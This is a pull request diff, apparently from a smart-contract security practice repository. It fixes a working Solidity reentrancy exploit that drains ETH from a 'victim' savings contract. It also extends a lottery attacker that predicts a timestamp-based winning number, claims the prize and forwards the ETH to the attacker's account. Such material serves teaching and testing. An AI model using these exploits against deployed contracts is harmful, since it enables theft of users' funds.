### PR TITLE
Fixed bug when executing the reentrant exploit

### DIFF
--- a/contracts/reentrancy/InvestorV2.sol
+++ b/contracts/reentrancy/InvestorV2.sol
@@ -12,18 +12,23 @@ interface ISavingsAccountV2 {
 
 contract InvestorV2 is Ownable {
   ISavingsAccountV2 public immutable savingsAccountV2;
+  uint private fundedAmountETH;
 
   constructor(address savingsAccountV2ContractAddress) {
     savingsAccountV2 = ISavingsAccountV2(savingsAccountV2ContractAddress);
   }
 
   function attack() external payable onlyOwner {
+    fundedAmountETH = msg.value;
     savingsAccountV2.deposit{ value: msg.value }();
     savingsAccountV2.withdraw();
   }
 
   receive() external payable {
-    if (address(savingsAccountV2).balance > 0) {
+    // Validates if the victim's contract ETH Balance is greater than the amount of ETH that the reentrant call will take
+    // If the reamining ETH on the victim contract is less than the ETH the reentrant call will take, an error will occur, and all the changes will be reverted!
+        // Error: VM Exception while processing transaction: reverted with reason string 'Address: unable to send value, recipient may have reverted'
+    if (address(savingsAccountV2).balance > fundedAmountETH) {
       console.log("");
       console.log("Reentring...");
       savingsAccountV2.withdraw();

--- a/contracts/weak-randomness/LotteryAttacker.sol
+++ b/contracts/weak-randomness/LotteryAttacker.sol
@@ -22,4 +22,16 @@ contract LotteryAttacker is Ownable {
   function getWinningNumber() private view returns (uint8) {
     return uint8(uint256(keccak256(abi.encodePacked(block.timestamp))) % 254) + 1;
   }
+  
+  // The winner of the lottery will be the address of this contract, thus, this contract needs to call the withdrawPrize() to claim the reward
+  function claimReward() external onlyOwner {
+    lottery.withdrawPrize();
+  }
+
+  // This contract must be able to receive ETH, asap as it receives some ETH, forwards it to the contract's owner (Attacker Account)
+  receive() external payable {
+    // Immediately send the ETHs to the attacker's account
+    payable(owner()).sendValue(address(this).balance);
+  }
+  
 }


### PR DESCRIPTION
If the reamining ETH on the victim contract is less than the ETH the reentrant call will take, an error will occur, and all the changes will be reverted! The reamining ETH balance on the victim contract must be greater than the ETH that will be taken in the next reentrant call, otherwise, an error will occur and all the contract's interaction changes will be reverted
/// Error: VM Exception while processing transaction: reverted with reason string 'Address: unable to send value, recipient may have reverted'